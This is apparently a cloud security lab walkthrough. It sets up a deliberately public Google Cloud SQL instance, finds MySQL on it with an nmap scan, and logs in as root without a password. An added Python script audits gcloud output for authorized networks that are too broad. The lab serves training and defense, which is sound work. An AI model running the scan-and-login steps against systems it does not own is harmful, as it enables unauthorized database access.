Attacking SQL Instance
To start the scenario, go to the scenario-2 folder by typing the command below in the shell:
cd scenario-2
Export the project ID by typing the command below in the GCLOUD Shell:
export PROJECT_ID="project-id"
Replace project-id with your project ID.
Next, configure gcloud to use the project by typing the command below in the shell:
gcloud config set project $PROJECT_ID
Next, enable the Cloud SQL Admin API by typing the command below in the shell:
gcloud services enable sqladmin.googleapis.com
Next, initialize Terraform by typing the command below in the shell:
terraform init
Next, apply the Terraform configuration by typing the command below in the shell:
terraform apply -auto-approve -var project-id=$PROJECT_ID
Note: Creating the resources will take some time, so be patient 🧘
Once it is done, note the ip-address of the SQL Instance from the terraform output.
Scenario info
Google SQL allows developers to set up a database without any hassle. By default, the database can be accessed only from an authorized network, but while debugging, a user may sometimes open the database to the public to make debugging easier. In this scenario, the attacker learns about the public-facing SQL Instance.
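An added example (not part of the original lab) of a defender-side check for the misconfiguration described above: it reads JSON shaped like the output of gcloud sql instances list --format=json and flags public-IP instances whose authorized networks are open to the whole internet or broader than a policy threshold. The function name audit_instances, the max_addresses threshold and the sample data are assumptions made for illustration.

```python
import ipaddress
import json

# Constructed sample, shaped like `gcloud sql instances list --format=json`.
# Instance names and addresses are made up (documentation/test ranges).
SAMPLE_JSON = """[
 {"name": "debug-db",
  "ipAddresses": [{"type": "PRIMARY", "ipAddress": "203.0.113.10"}],
  "settings": {"ipConfiguration": {"ipv4Enabled": true,
    "authorizedNetworks": [{"name": "debug", "value": "0.0.0.0/0"}]}}},
 {"name": "office-db",
  "ipAddresses": [{"type": "PRIMARY", "ipAddress": "203.0.113.20"}],
  "settings": {"ipConfiguration": {"ipv4Enabled": true,
    "authorizedNetworks": [{"name": "office", "value": "198.51.100.0/28"},
                           {"name": "vendor", "value": "198.18.0.0/15"}]}}},
 {"name": "private-db",
  "ipAddresses": [{"type": "PRIVATE", "ipAddress": "10.10.0.5"}],
  "settings": {"ipConfiguration": {"ipv4Enabled": false}}}
]"""


def audit_instances(instances, max_addresses=256):
    """Flag authorized networks that expose a public-IP instance too widely.

    Returns (severity, instance, public_ip, cidr) tuples. max_addresses is an
    assumed policy threshold, not a Cloud SQL setting.
    """
    findings = []
    for inst in instances:
        cfg = inst.get("settings", {}).get("ipConfiguration", {})
        if not cfg.get("ipv4Enabled"):
            continue  # no public IP, so authorized networks do not apply
        public_ip = next((a["ipAddress"] for a in inst.get("ipAddresses", [])
                          if a.get("type") == "PRIMARY"), None)
        for net in cfg.get("authorizedNetworks", []):
            cidr = ipaddress.ip_network(net["value"], strict=False)
            if cidr.prefixlen == 0:
                severity = "CRITICAL"   # 0.0.0.0/0: anyone can reach the port
            elif cidr.num_addresses > max_addresses:
                severity = "WARN"       # broader than the policy allows
            else:
                continue
            findings.append((severity, inst["name"], public_ip, str(cidr)))
    return findings


if __name__ == "__main__":
    for finding in audit_instances(json.loads(SAMPLE_JSON)):
        print(*finding)
```

To run it against a real project, save the gcloud JSON output to a file and pass the parsed list to audit_instances in place of the sample.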
Solution
First, we are going to perform some reconnaissance on the Instance using nmap. To do that, we first need to install nmap in the GCLOUD Shell by typing the command below in the shell:
sudo apt-get install nmap -y
Next, run the nmap scan by typing the command below in the shell:
nmap -Pn <SQL INSTANCE IP>
Running the Nmap scan on the IP reveals that the MySQL service is running on the given instance.
mysql -u root -h <ip>
Note: This scenario assumes there is no authentication for the database, but in the real world you may find some weak credentials.
Enter \q to exit the database.
Clean up
To clean up the scenario, type the command below in the GCLOUD Shell:
terraform destroy -auto-approve -var project-id=$PROJECT_ID